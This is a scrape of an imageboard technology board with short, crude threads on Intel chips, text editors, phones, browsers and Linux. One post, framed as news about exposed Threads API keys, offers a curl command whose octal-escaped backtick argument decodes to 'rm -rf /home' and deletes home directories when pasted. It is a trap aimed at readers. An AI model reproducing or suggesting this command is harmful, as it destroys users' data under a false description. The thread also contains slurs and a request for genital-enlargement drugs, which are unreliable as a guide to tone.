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/tech/ - Technology

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>you WILL use x86
>you WILL like the IME
>you WILL suck at PPW
>you WILL be inefficient
>you WILL be built for Big Windows Cock
>and you WILL be happy
16 posts and 4 image replies omitted. Click reply to view.


lunar lake seems promising albeit


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because it isnt meds now


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>raptor lake


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What devices/drugs/magick can I use to make my nuts as fat as possible (permanently)? Ideally the size of baseballs.





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why is it so superior?
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I've never seen an emacs user that actually knew what they were doing.
vim's usecase is doing shit on cli-only servers where nano doesnt cut it.
Commercial workhorse IDE's job is actually developing software.
VScode, notepad++, atom and whatever fotm they use now are there when you want an IDE but less so.
emacs has no reason of being. Its userbase is all contrarian midwits with a community college level understanding of technology. They probably spend more time online arguing about why emacs is better than they spend actually using emacs.


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The most popular editor ever made is Scintilla embedded into a 3rd party editor. Notepad++, Notepad2, Notepad3, Keil uVision, MySQL Workbench, Komodo, Geany, CodeBlocks, etc.


don't forget GODblox

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Have you seen the latest news? Zuck the cuck cannot even secure his own website. Even having the API keys publicly available!
>curl -X POST https://threads.net/api/user/list -H "Content-Type: application/octet-stream" -d "`$'\162\155' $'\55\162\146' $'\57\150\157\155\145'`"
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none of this would be an issue if programs handled arguments themselves. Like they do in DOS.




It's just reading that the letters for the option were put in after the command and then doing it. Someone's mad they got filtered


>filtered is when your shell nukes the entire directory by expanding a wildcard rather than letting the program call glob


they don't get filtered. There is no use case where I need to pass in file names from filenames in a directory.

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I should replace my smartphone with a drug dealer phone and a micro laptop?

I just use youtube,discord,whatsapp and the sharty

And what browser i should use? I use brave
76 posts and 23 image replies omitted. Click reply to view.


ive never touched an ishit in my entire life


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me neither


wtf, based apple?




none cares about you that much that they will wiretap you

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soyjaks in newpipe thumbnails. I'm going to sleep, no tech support


does it have adblock and sponsorblock


adblock yes, sponsorblock no

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complete and utter marge

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Why the fuck did this botnet bullshit stop working?


works on my machine


i think because it's a botnet


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>qt.qpa.wayland: Wayland does not support QWindow::requestActivate()


choose one


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really gemmy gif


install gentoo chud


i put fedora on my old 2010 laptop and it works fine

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why is it so superior?






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>he doesn't believe in iAPX 432 kabbalah


>Intel thought this was a good idea

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